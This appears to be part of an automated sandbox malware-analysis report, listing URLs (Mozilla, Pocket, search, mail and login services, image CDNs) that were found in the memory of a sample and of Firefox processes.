Source: firefox.exe, 00000021.00000003.3203517342.0000016DEA3FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152391838.0000016DDE0B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3191939859.0000016DE9A8E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207334568.0000016DDE0B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2814195790.0000016DDD383000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3144642447.0000016DDE0B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3190357375.0000016DDE0B0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3167800992.0000016DEA9DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3165602215.0000016DEA9EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3166260392.0000016DEA9DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2443461235.000000000278C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://eat.hungryroot.com/hungryroot-reset?utm_medium=paid
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://electricliterature.com/8-novels-about-the-dangerous-pursuit-of-youth-and-beauty/?utm_source=
Source: firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000021.00000003.2967575994.0000016DE04A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000021.00000003.3212471692.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net
Source: firefox.exe, 00000021.00000003.3215505857.0000016DE4B61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B01512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000003.3126198363.0000016DE68B4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3125801220.0000016DEA264000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3122392806.0000016DE68AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3124555602.0000016DE68D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3124692516.0000016DE68AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000021.00000003.2872801163.0000016DDF8C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8C3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000021.00000003.3169134521.0000016DEA950000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA3EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.dns.nextdns.io/
Source: firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3158551690.0000016DE97E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com
Source: firefox.exe, 00000021.00000003.3221424465.0000016DE9747000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3221635085.0000016DE6BF9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?_expe
Source: firefox.exe, 00000021.00000003.3203736370.0000016DEA336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com/
Source: firefox.exe, 00000021.00000003.3212719724.0000016DE97AE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com/1
Source: firefox.exe, 00000021.00000003.3156750421.0000016DEA318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B01512000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B015CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000021.00000003.3221635085.0000016DE6BF9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3156750421.0000016DEA318000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f22
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B015CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002D.00000002.3283706595.0000022B0152F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/collections/the-jobs-you-didnt-know-existed?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/25-years-later-this-cozy-n64-classic-finally-gets-the-recognition
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/a-magnetic-therapy-for-depression-gains-precision?utm_source=pock
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/an-old-virginia-plantation-a-new-owner-and-a-family-legacy-unveil
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/crunchwrap-supreme?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/do-you-have-a-shadow-side-the-psychology-of-why-we-find-some-peop
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/essential-bike-maintenance-tips-everyone-should-know?utm_source=p
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/here-s-a-list-of-everything-haruki-murakami-has-ever-compared-to-
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/how-to-compost-an-easy-diy-guide?utm_source=pocket-newtab-en-us
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/how-to-sleep-better-the-4-best-strategies-according-to-the-expert
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210808240.0000016DEA8DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/mechanical-movements-of-the-cold-war-how-the-soviets-revolutioniz
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/restaurant-work-can-destroy-your-body-but-it-doesn-t-have-to?utm_
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/the-beginner-s-guide-to-catching-your-first-fish?utm_source=pocke
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/the-bizarre-cultural-history-of-saliva?utm_source=pocket-newtab-e
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/the-first-reviews-of-every-virginia-woolf-novel?utm_source=pocket
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210808240.0000016DEA8DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/the-ideal-vacation-length-for-peak-relaxation-according-to-expert
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/the-lazarus-heist-how-north-korea-almost-pulled-off-a-billion-dol
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/the-million-dollar-scammer-and-his-many-mormon-marks?utm_source=p
Source: firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/the-mysterious-case-of-the-f-117-nighthawk-s-flip-down-radar-loca
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/the-scientific-underpinnings-and-impacts-of-shame?utm_source=pock
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/why-is-my-hair-changing-texture-and-when-should-i-see-a-professio
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/item/why-there-s-still-no-new-birth-control-for-men?utm_source=pocket-
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE66DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 00000021.00000003.2813756993.0000016DDD36B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2811196569.0000016DDD350000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809919292.0000016DDD336000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809382625.0000016DDD100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2809662680.0000016DDD31C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000021.00000003.3216728852.0000016DE496D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE662C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hips.hearstapps.com/hmg-prod/images/garmin-race-adaptive-training-rwd060124-669aaf40f0f0d.jp
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210808240.0000016DEA8DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://i.kinja-img.com/image/upload/c_fill
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://i.natgeofe.com/n/aa2728ac-4a75-4b3e-9163-2b32a66e9d1d/MM100710_230501_00795_16x9.JPG?w=1200
Source: firefox.exe, 00000021.00000003.3167497219.0000016DEA924000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3171125970.0000016DE4874000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ib.absa.co.za/
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ichef.bbci.co.uk/images/ic/480xn/p0jdbybk.jpg.webp
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3210723597.0000016DEA8E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://identity.mozilla.com/apps/relay
Source: firefox.exe, 00000021.00000003.3202514292.0000016DEA8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://images.fastcompany.com/image/upload/f_auto
Source: firefox.exe, 00000021.00000003.3160209289.0000016DE6762000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2F149349728.v2.pressablecdn.com%2Fwp-co
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fd1n0c1ufntxbvh.cloudfront.net%2Fphoto
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fhips.hearstapps.com%2Fhmg-prod%2Fimag
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fi.natgeofe.com%2Fn%2Faa2728ac-4a75-4b
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fichef.bbci.co.uk%2Fimages%2Fic%2F480x
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fimgix.bustle.com%2Fuploads%2Fimage%2F
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fmedia.wired.com%2Fphotos%2F669ee1db82
Source: firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2F3c46a6db9
Source: firefox.exe, 00000021.00000003.3208062027.0000016DEE29F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197686918.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3201836603.0000016DEE22A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200386647.0000016DEE22A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2F8c6ba2700
Source: firefox.exe, 00000021.00000003.3208062027.0000016DEE29F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3197686918.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200257761.0000016DEE23D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3207252643.0000016DEE2BD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200929829.0000016DEE2C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2Ff85f50edc
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorp
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fs3.us-east-1.amazonaws.com%2Fpocket-c
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/direct?url=https%3A%2F%2Fwww.motherjones.com%2Fwp-content%2Fup
Source: firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img.pastemagazine.com/wp-content/juploads/2024/07/olympicbeds.jpg
Source: firefox.exe, 00000021.00000003.3155111685.0000016DEAA85000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3208834109.0000016DEE242000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imgix.bustle.com/uploads/image/2024/7/24/d57cdb8b/quitcooking_social.jpg?w=1200&h=630&fit=cr
Source: file.exe, 00000000.00000002.2461529806.0000000028D7C000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.3286697948.00000221E20EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000021.00000003.3128000136.0000016DDE287000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkr4C8afQLY4CHW1plrfCDYftIWHG7kJnEYgFIvxnEnJrNWxnwmH
Source: firefox.exe, 00000021.00000003.3202170893.0000016DECCFB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-desktop/events/1/a41b546f-2a45-4575-b7b2-1924b
Source: firefox.exe, 00000021.00000003.3213385438.0000016DE6633000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3206351859.0000016DE6634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000021.00000003.3203254934.0000016DEA83E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3160209289.0000016DE67CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3200643077.0000016DEE217000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3221850152.0000016DE67CC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3128258779.0000016DDE270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000021.00000003.2896043336.0000016DDE44E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000021.00000003.3221850152.0000016DE67CC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000021.00000003.2872801163.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000021.00000003.2872801163.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2984375808.0000016DDF8BF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000021.00000003.2928383306.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3042281240.0000016DDA532000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2976296352.0000016DDA675000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2941014832.0000016DDA67C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3041198539.0000016DDA677000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2949605487.0000016DDA53B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3029404561.0000016DDA531000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
